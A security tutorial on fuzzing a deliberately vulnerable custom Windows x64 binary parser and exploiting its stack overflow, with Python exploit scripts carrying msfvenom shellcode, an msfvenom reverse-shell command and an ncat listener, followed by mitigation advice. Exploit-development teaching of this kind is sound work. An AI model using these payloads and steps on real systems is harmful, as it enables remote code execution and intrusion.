Hunting 0-days: Exploiting a Custom Binary Parser on Windows x64

0. Introduction

Before a CVE gets a number and a patch, someone has to find the vulnerability. This is what that process actually looks like, from a fuzzer detecting an anomaly to a reverse shell landing on the attacker’s machine. The classic approaches for finding vulnerabilities are:

Type	Explanation
Static analysis	Disassembling the software and understanding it
Dynamic analysis	Testing and understanding the software’s reactions by debugging and running it
Taint analysis	Tracking how untrusted input flows through the program and which operations it reaches

Most security researchers rely on existing fuzzers. I wanted to understand what happens underneath, so I built one. It includes a custom structure-aware seed generator that knows where, how, and how intensely to mutate the data in order to trigger certain vulnerabilities.

1. Preparation

The environment we are working in is Windows x64.

The file we will be testing is a realistic binary parser. It has 4 vulnerable functions inside and, to test how well my fuzzer performs, I added 4 layers of security that filter the input before parsing it. I then compiled it without stack protector for demonstration purposes.

The fuzzer I used is not publicly available yet since it’s still under development but you can easily use another one like AFL++.

The debugger I used is x64dbg and I developed the exploit and POC (proof of concept) using Python.

2. Fuzzing

To build the corpus, my fuzzer needs a starting seed: an input that the target parses normally, without crashing. If you don’t have one, you can usually find sample files on GitHub by searching for the extension you need. In my case, the starting seed is a .bin file.

Aiming the fuzzer at the target, loaded with the seed, I get this:

Instantly, it found a crash seed that bypassed the security layers and stopped the process so we can continue our research.

As we can see, the fuzzer tells us that the type of mutation that caused the crash is called Boundary. My tool’s function that creates this kind of mutation looks like this:

This function “lied” about the size of the data we were going to feed to the victim (Length Corruption), which resulted in the crash. With this in mind, we can assume that the crash was caused by a buffer overflow.
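To make the idea of a Boundary mutation concrete, here is a minimal sketch of length corruption. It is not the function from my fuzzer: the names build_seed and boundary_mutations are hypothetical, and the header layout (magic, version, 8-byte opcode, 32-bit length at offset 16) is an assumption taken from the scripts used later in this article.

```python
import struct

# Assumed header layout, inferred from the scripts in this article:
# magic (4 bytes) | version (uint32) | opcode (8 bytes) | length (uint32) | data
LENGTH_OFFSET = 16
HEADER_SIZE = 20


def build_seed(data):
    """Build a well-formed input whose length field matches the data."""
    header = b"\x01\x02\x03\x04" + struct.pack("<I", 1) + b"NormalTx"
    return header + struct.pack("<I", len(data)) + data


def boundary_mutations(seed):
    """Return copies of the seed whose length field holds boundary values."""
    real_len = len(seed) - HEADER_SIZE
    candidates = [0, real_len - 1, real_len + 1, 0x7F, 0x80, 0xFF, 0x100,
                  0x7FFF, 0x8000, 0xFFFF, 0x7FFFFFFF, 0xFFFFFFFF]
    mutants = []
    for value in candidates:
        if value < 0 or value == real_len:
            continue  # skip negative values and the unmodified seed
        mutant = bytearray(seed)
        struct.pack_into("<I", mutant, LENGTH_OFFSET, value)  # overwrite only the length field
        mutants.append(bytes(mutant))
    return mutants


seed = build_seed(b"hello world")
for mutant in boundary_mutations(seed):
    declared = struct.unpack_from("<I", mutant, LENGTH_OFFSET)[0]
    print(f"declared length = {declared:#x}, actual data = {len(mutant) - HEADER_SIZE} bytes")
```

Every mutant keeps the data untouched and changes only what the header claims about it, which is exactly the kind of disagreement a parser that trusts the length field cannot handle.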

3. Debugging

Let’s fire up our debugger and find out what actually happened. After loading the target and passing it the crash_DETECTED.bin we can see that the execution stopped here:

Look at the memory dump! It has been overflowed, resulting in an EXCEPTION_ACCESS_VIOLATION error:

4. Gathering information

To confirm the vulnerability and measure the buffer, we need to flood it with something called a Cyclic Pattern. This is no longer a big string of “A”s that overflows the memory; it is a specially crafted sequence in which every short substring is unique, which lets us measure how much data we need before our input overwrites the saved return address, the value that is loaded into the Instruction Pointer (RIP) when the function returns. RIP decides which instruction the processor executes next, so by overflowing the stack with exactly the right amount of data, we can make it point to our shellcode and take control.

To deliver our Cyclic Pattern I used the following code, which writes it into another .bin file:

import struct

# File header expected by the target parser
payload = bytearray()
payload += b'\x01\x02\x03\x04'       # Magic bytes (file format)
payload += struct.pack('<I', 1)      # Version number, packed as little-endian uint32
payload += b'NormalTx'               # OpCode for routing the execution
payload += struct.pack('<I', 0x150)  # Declared data length

# Cyclic pattern: every 3-byte group (Aa0, Aa1, ...) appears only once
pattern = (
    b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
    b"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
    b"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
    b"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
)

payload += pattern[:200]  # Use the first 200 bytes of the pattern as data

with open("crash_test.bin", "wb") as f:
    f.write(payload)

Give this to our target using the Command line and look at the registers and the stack:

RSP points at our pattern, and the bytes there begin with 'a5Aa6Aa7Aa8...'. This tells us two things:

The bytes at RSP are the overwritten return address. On x64, an address made of pattern bytes is non-canonical, so the processor typically faults on the ret instruction itself, before RIP is loaded, and RSP still points at the value that ret was about to pop.
The substring a5Aa6Aa7 starts at offset 16 of the pattern, so 16 bytes of our data sit in front of the return address.

Section	Size	Content
Padding (junk)	16 bytes	`Aa0Aa1Aa 2Aa3Aa4A`
Return address (loaded into RIP)	8 bytes	`a5Aa6Aa7`
Stack after the return (where RSP lands)	The rest	`Aa8Aa9Ab...`

As you can see, the pattern acts as a ruler: it measures how many bytes of padding we need to reach the saved return address, which bytes end up in RIP, and where RSP points once the function has returned, which is where the shellcode will go.

To build the exploit we need three things:

How much junk we need to reach the return address.
What address we put there.
Where the processor should land next, in order to execute our shellcode.

4.1 Creating the padding and reaching the RIP

As measured above, the saved return address sits at offset 16 of our data, so the padding has to be exactly 16 bytes. With fewer bytes the return address is only partially overwritten, and with more bytes our own address is pushed past it. Keep this number in mind.
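The offset can also be computed instead of counted by hand. The following is a minimal sketch that regenerates the same Aa0Aa1Aa2... pattern and looks up the substring that x64dbg showed at RSP. The helper names cyclic and find_offset are my own for this example and do not come from any particular tool.

```python
import string


def cyclic(length):
    """Generate an Aa0Aa1Aa2... pattern of the requested length."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern is limited to 26 * 26 * 10 * 3 bytes")


def find_offset(needle, length=1024):
    """Return the offset of needle inside the pattern, or -1 if it is absent."""
    return cyclic(length).find(needle)


pattern = cyclic(200)
print(pattern[:24])              # b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7'
print(find_offset(b"a5Aa6Aa7"))  # 16
```

The result, 16, is the amount of padding used in the exploit scripts. If you copy the value from a register instead of from the memory dump, reverse the byte order first, because x64 stores values in little-endian order.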

4.2 Writing the instruction

When the vulnerable function returns, its ret instruction pops our overwritten return address into RIP. Here we will place the address of an instruction that acts like a trampoline right to our shellcode. This instruction needs to be a jmp rsp: right after the ret, RSP points at the bytes that follow the return address, which is where the rest of our payload sits, so jmp rsp sends execution straight there.

We could look for one in the target’s own memory, but ASLR randomizes those addresses, so we will take an address from one of the Windows DLLs (kernel32.dll or ntdll.dll) instead:

In a real scenario with ASLR fully enabled, this address would change on every reboot. Defeating it requires either an information leak or a non-ASLR module, which we’ll cover later.

In x64dbg, we navigate to Symbols and look for kernel32.dll or ntdll.dll. Double-click on it and in the CPU tab, hit Ctrl+Shift+B to look for our instruction pattern. Here we insert FF E4 which stands for jmp rsp in hex:

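In the References tab there is a list of addresses. We will choose one whose lower six bytes contain no null octets (00). The two highest bytes of a user-mode x64 address are always 00, but they end up at the very end of the packed address: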

Note down this address. We will need it later.
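To see how the address will look inside the file, it helps to pack it the same way the exploit script does. This is a small sketch using the example address from this article; the value on your machine will be different.

```python
import struct

# Example value copied from this article; replace it with the one you noted down.
jmp_rsp_address = 0x00007FF8709039D3

packed = struct.pack("<Q", jmp_rsp_address)  # 8 bytes, least significant byte first
print(packed.hex(" "))                        # d3 39 90 70 f8 7f 00 00

# Position of the first null byte within the packed address (-1 if there is none)
print(packed.find(b"\x00"))                   # 6
```

The only null bytes are the last two, which come from the always-zero top of the 64-bit address. Whether they cause trouble depends on how the target copies its input, so treat this as a check rather than a guarantee.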

4.3 Placing the shellcode

After the jmp rsp, the processor continues executing at the address held in RSP. Here is where the magic happens. We will store our shellcode here, and in front of it we will write a field of NOPs (No Operation, opcode 0x90). The processor slides down through these NOPs like a rollercoaster and lands right in our trap. The field doesn’t need a specific size, so just to be sure it has some fun before executing the shellcode, we will use 24 bytes.

I generated my shellcode using msfvenom. To prove it works, this code only pops up the calculator app.

msfvenom -p windows/x64/exec CMD=calc.exe -f python -b '\x00'

5. Proof of concept

Let’s recap before we continue:

The padding is 16 bytes.
We have the jmp rsp address.
We have the shellcode ready.

Altogether, our Proof of Concept script looks like this:

import struct

payload = bytearray()
payload += b'\x01\x02\x03\x04'       # Magic bytes (file format)
payload += struct.pack('<I', 1)      # Version number, packed as little-endian uint32
payload += b'NormalTx'               # OpCode for routing the execution
payload += struct.pack('<I', 0x150)  # Declared data length

data_payload = bytearray()
data_payload += b"A" * 16  # 16 bytes of padding to reach the saved return address

jmp_rsp_address = 0x00007FF8709039D3  # Replace with your own jmp rsp address

data_payload += struct.pack('<Q', jmp_rsp_address)  # Overwrites the saved return address

shellcode = (        # msfvenom generated shellcode (CMD=calc.exe)
b"\x53\x56\x57\x55\x54\x58\x66\x83\xE4\xF0\x50\x6A\x60\x5A\x68\x63\x61\x6C\x63"
b"\x54\x59\x48\x29\xD4\x65\x48\x8B\x32\x48\x8B\x76\x18\x48\x8B\x76\x10\x48\xAD"
b"\x48\x8B\x30\x48\x8B\x7E\x30\x03\x57\x3C\x8B\x5C\x17\x28\x8B\x74\x1F\x20\x48"
b"\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x8D\x52\x02\xAD\x81\x3C\x07\x57\x69"
b"\x6E\x45\x75\xEF\x8B\x74\x1F\x1C\x48\x01\xFE\x8B\x34\xAE\x48\x01\xF7\x99\xFF"
b"\xD7\x48\x83\xC4\x68\x5C\x5D\x5F\x5E\x5B\xC3"
)
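data_payload += b"\x90" * 24  # NOP field in front of the shellcode
data_payload += shellcode

# Fill the rest of the data section with NOPs up to the declared length
final_payload = payload + data_payload.ljust(0x150, b'\x90')

with open("exploit_calc.bin", "wb") as f:
    f.write(final_payload)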

After loading the exploit_calc.bin in the target’s debugging session, set the memory permissions to ERW-- (Execute, Read, Write), and run it until the calculator pops up:

Setting the memory permissions to ERW-- is a shortcut in our exploitation process for the sake of the POC. In a future article I will explain how we can program our exploit to set these permissions itself using a ROP (Return-Oriented Programming) chain.

And there it is! The processor executed our “malware” and opened up the calculator.

6. Exploitation (popping a shell)

We change the previous command to this:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b '\x00\x0a\x0d\x20\x09\x0b' -f python

We use 127.0.0.1 as the listener’s IP address and the port 4444.
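The -b flag tells msfvenom to avoid those bytes (“bad characters”) in the generated shellcode. Null bytes, line breaks, spaces, and tabs are the values an input routine is most likely to truncate or alter, which would corrupt the shellcode before it ever runs.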
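Before pasting any generated bytes into the script, it is worth confirming that none of the excluded values slipped in. Here is a minimal sketch of such a check; find_bad_bytes is a hypothetical helper name, and the sample buffer is made of stand-in bytes, not real shellcode.

```python
BAD_BYTES = b"\x00\x0a\x0d\x20\x09\x0b"  # the same list that was passed to msfvenom -b


def find_bad_bytes(data, bad=BAD_BYTES):
    """Return (offset, byte value) pairs for every forbidden byte in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


sample = b"\x90\x90\x41\x0a\x42\x00"  # stand-in bytes containing two bad characters
for offset, value in find_bad_bytes(sample):
    print(f"offset {offset}: 0x{value:02x}")
```

An empty result means the buffer is free of the listed values. Which bytes are actually “bad” depends on how the target reads its input, so the list above is only the one chosen for this demonstration.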

Now that we have new shellcode, we increase the declared size of our payload so that the larger shellcode fits inside it:

import struct

TOTAL_SIZE = 0x300   # Larger declared length so the longer shellcode fits
PADDING_SIZE = 16    # Bytes needed to reach the saved return address

header = bytearray()
header += b'\x01\x02\x03\x04'            # Magic bytes (file format)
header += struct.pack('<I', 1)           # Version number
header += b'NormalTx'                    # OpCode for routing the execution
header += struct.pack('<I', TOTAL_SIZE)  # Declared data length

data_payload = bytearray()
data_payload += b"A" * PADDING_SIZE

jmp_rsp_address = 0x00007FF8709039D3  # Replace with your jmp rsp address

data_payload += struct.pack('<Q', jmp_rsp_address)  # Overwrites the saved return address
data_payload += b"\x90" * 24                        # NOP field in front of the shellcode

buf =  b""
buf +=  b"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d"
buf +=  b"\x05\xef\xff\xff\xff\x48\xbb\x63\xfe\x15\xf7\x62"
#...  write the shellcode msfvenom generated for you
buf +=  b"\x2e\x64\xa4\xea\x24\xea\x22\x62\x2e\x3d\xe5"  

data_payload += buf

# Fill the rest of the data section with NOPs up to the declared length
final_content = header + data_payload.ljust(TOTAL_SIZE, b'\x90')

with open("exploit_shell.bin", "wb") as f:
    f.write(final_content)

We set up a listener in another PowerShell terminal:

PS D:/> ncat -lvnp 4444

Now let’s feed exploit_shell.bin to our target and see what happens:

And there it is! A reverse shell right into the attacker’s machine, initiated when the processor executed our msfvenom generated shellcode.

7. Conclusion & Mitigation

The Role of the Crash: From Denial of Service to Control

Many people see a program crash as just a “bug” that closes the software, technically known as a Denial of Service (DoS). However, for an exploit developer, a crash is a strong starting point. Here is why the crash file was our best friend:

Vulnerability Confirmation: The crash was the definitive proof that our fuzzer found a “hole” in the security layers. It confirmed that the parser’s logic failed to handle our mutated Boundary input, allowing data to spill out of its assigned memory space.
Debugging: The debugger froze the entire CPU state. This allowed us to inspect the Registers and see exactly where the program stopped working properly. Without the crash, we wouldn’t have known that the RIP (Instruction Pointer) was overwritten with our data.
Identifying the Offset: By looking at the crash in x64dbg, we didn’t just see an error; we saw what was in the registers. This is what allowed us to use a Cyclic Pattern effectively. The crash told us: “You hit the RIP at exactly this byte”.
The Bridge to RCE: A crash is like a car hitting a wall. By analyzing the “skid marks” (memory corruption), we learned how to steer the car around the wall next time. We transformed a destructive event into a constructive one (Remote Code Execution) by replacing the “junk” data that caused the crash with the address of a jmp rsp instruction.

In the Information Gathering stage, an attacker can scan the target machine for running software, including its version. They can then replicate everything inside their own lab and develop an exploit without ever touching the production server or alerting the victim’s security systems. This is called Off-target Debugging.

Even Google uses 25,000 virtual machines and about 100,000 cores to fuzz Chrome and find such bugs before attackers do. Since Chrome’s launch, they have discovered over 30,000 0-day vulnerabilities.

How to prevent this?

Use safe functions. The root cause here was a parser that trusted a caller-supplied length without validating it. Bounded functions like memcpy_s() or strncpy() enforce size limits at the call site, but they only help if you pass the correct bounds. The real fix is input validation before any copy operation happens. Treat every length field in a binary protocol as hostile until proven otherwise.
Enable Stack Canaries (/GS). The compiler inserts a random value between the local variables and the return address. Before the function returns, it checks whether that value was tampered with. A classic stack overflow like this one would have been caught before we ever got to control RIP, and the process would have been terminated instead of handing us execution.
Don’t disable ASLR or DEP. ASLR randomizes the base addresses of modules, which means the jmp rsp address we hardcoded from a system DLL would stop working after a reboot or on a different machine. DEP (Data Execution Prevention) would have stopped the shellcode on the stack from running at all, since that memory region isn’t marked executable by default. Together, these two mitigations turn a working exploit into a research problem.
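The first point, validating the length field before any copy, can be sketched as follows. This is an illustration of the order of the checks, not the target’s real code: the header layout is the one assumed by the scripts in this article, MAX_DATA is a hypothetical buffer capacity, and a real parser written in C or C++ would perform the same comparisons before calling its copy routine.

```python
import struct

MAGIC = b"\x01\x02\x03\x04"
HEADER = struct.Struct("<4sI8sI")  # magic, version, opcode, declared length
MAX_DATA = 16                      # hypothetical capacity of the destination buffer


def parse(blob):
    """Return the data section, rejecting any length field that cannot be trusted."""
    if len(blob) < HEADER.size:
        raise ValueError("truncated header")
    magic, version, opcode, declared = HEADER.unpack_from(blob)
    if magic != MAGIC:
        raise ValueError("bad magic")
    available = len(blob) - HEADER.size
    if declared > available:
        raise ValueError("length field exceeds the bytes actually present")
    if declared > MAX_DATA:
        raise ValueError("length field exceeds the destination buffer")
    return blob[HEADER.size:HEADER.size + declared]


good = HEADER.pack(MAGIC, 1, b"NormalTx", 4) + b"data"
print(parse(good))  # b'data'

oversized = HEADER.pack(MAGIC, 1, b"NormalTx", 0x150) + b"A" * 0x150
try:
    parse(oversized)
except ValueError as err:
    print("rejected:", err)
```

The declared length is compared both against what the file really contains and against what the destination can hold, and only then is anything copied. An input like the ones built in this article is rejected at the second check.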

That said, none of these are silver bullets. A determined attacker with enough resources can bypass DEP using an ROP chain. This is a technique that repurposes existing executable code instead of injecting new shellcode. ASLR can be defeated through information leaks. Stack canaries don’t protect against overwrites that skip the canary entirely. This is why defense in depth matters: the goal is to make exploitation so expensive that it isn’t worth it.

In the next article, we’ll look at exactly how a ROP chain bypasses DEP and what it takes to stop one.